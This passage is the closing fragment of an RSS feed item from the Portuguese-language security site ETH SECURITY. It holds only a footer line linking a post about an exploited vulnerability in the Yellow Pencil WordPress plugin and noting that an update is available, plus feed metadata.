<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/">Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">106</post-id>	</item>
	</channel>
</rss>
